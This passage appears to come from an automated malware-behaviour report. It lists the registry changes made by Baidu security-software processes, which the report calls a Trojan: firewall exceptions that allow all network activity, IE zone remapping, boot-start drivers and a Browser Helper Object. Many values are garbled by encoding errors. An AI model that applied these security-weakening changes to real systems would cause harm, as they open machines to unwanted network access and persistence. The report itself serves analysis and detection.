"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, bddriver, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"

"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30803"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢BUGÃƒÂ¤Ã‚Â¸Ã…Â ÃƒÂ¦Ã…Â Ã‚Â¥ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ©Ã‚Â«Ã‹Å“ÃƒÂ©Ã¢â€šÂ¬Ã…Â¸ÃƒÂ¤Ã‚Â¸Ã¢â‚¬Â¹ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ¥Ã¢â€žÂ¢Ã‚Â¨"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢BUGÃƒÂ¤Ã‚Â¸Ã…Â ÃƒÂ¦Ã…Â Ã‚Â¥ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

"BaiduSd.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¤Ã‚Â¸Ã‚Â»ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¦Ã¢â‚¬Â°Ã‹Å“ÃƒÂ§Ã¢â‚¬ÂºÃ‹Å“ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¦Ã¢â‚¬Â°Ã‹Å“ÃƒÂ§Ã¢â‚¬ÂºÃ‹Å“ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ©Ã‚Â«Ã‹Å“ÃƒÂ©Ã¢â€šÂ¬Ã…Â¸ÃƒÂ¤Ã‚Â¸Ã¢â‚¬Â¹ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ¥Ã¢â€žÂ¢Ã‚Â¨"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¦Ã…â€œÃ‚ÂÃƒÂ¥Ã…Â Ã‚Â¡ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¦Ã¢â‚¬ÂºÃ‚Â´ÃƒÂ¦Ã¢â‚¬â€œÃ‚Â°ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¦Ã¢â‚¬ÂºÃ‚Â´ÃƒÂ¦Ã¢â‚¬â€œÃ‚Â°ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¦Ã…â€œÃ‚ÂÃƒÂ¥Ã…Â Ã‚Â¡ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag"

The process BaiduHips.exe:3260 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
"Group" = "bddriver"
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 42 BA 68 E6 D6 5D 88 94 D2 31 53 4B F7 B6 49"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
"DisplayName" = "bd0001"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\GetSupplyId.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\KVInstallHelper.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667.bak\bd0001.dll.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch.bak,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
"Description" = "bd0001"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

The process BaiduHips.exe:320 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
"Group" = "bddriver"
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 7D C4 47 59 87 2A C6 05 E4 0D B5 7F 25 59 F1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
"DisplayName" = "bd0001"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch.bak,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
"Description" = "bd0001"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

The process netsh.exe:2640 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 72 13 D7 06 EE E8 C2 D0 2D B5 67 8E 4D 1F 9F"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process BDKVWsc.exe:2568 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 37 9A 77 FC C6 44 F3 68 DC 3E 1B 06 35 45 E9"

The process BDKVWsc.exe:2668 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 AE 50 42 A3 70 E8 26 C1 C6 48 F7 FF EB 58 B6"

The process RegSvr32.exe:2972 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\BDSWShellExt.BDSWShellExtMenu]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]
"(Default)" = "{70891BDB-3BE3-45A9-96B6-184ABA962091}"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "PSFactoryBuffer"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\NumMethods]
"(Default)" = "3"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
"ThreadingModel" = "Both"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "IBDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\ProxyStubClsid32]
"(Default)" = "{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\AppID\{A8B81847-1462-4756-9D4A-F506BC5361CD}]
"(Default)" = "BDSWShellExt"

[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\AppID\BDSWShellExt.DLL]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{11292110-6F8D-4D56-863C-44902A1E7880}" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CurVer]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 23 D2 B7 0B A2 95 DF D8 A6 EC 31 04 76 F7 CC"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1]
"(Default)" = "BDSWShellExtMenu Class"

The Trojan deletes the following registry key(s):

[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]

The process RegSvr32.exe:2256 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 89 F1 0E 50 4A 3B 2A D0 B2 79 71 13 07 B0 D3"

[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"

[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"

The Trojan deletes the following registry key(s):

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
[HKCR\BDShellExt.BDShellExtMenu\CLSID]
[HKCR\BDShellExt.BDShellExtMenu.1]
[HKCR\BDShellExt.BDShellExtMenu]

The process RegSvr32.exe:560 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B A1 F1 EA EE 82 77 1D 8D B5 4E 15 5A 33 DE 86"

The process RegSvr32.exe:1232 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 12 A1 17 A9 F2 C4 64 BE E6 3E 7E D4 BE 4E 12"

[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll"

[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "WebMonBHO"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "BDHOOK"

"NoExplorer" = "1"

The process RegSvr32.exe:2360 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 B8 20 6B DD 9F A6 F1 02 82 5F A1 FE 62 CB 74"

The process bddownloader.exe:2600 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"

[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"

[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 C1 3B D2 F1 8A 62 48 76 B9 52 FC 65 A4 46 F0"

[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

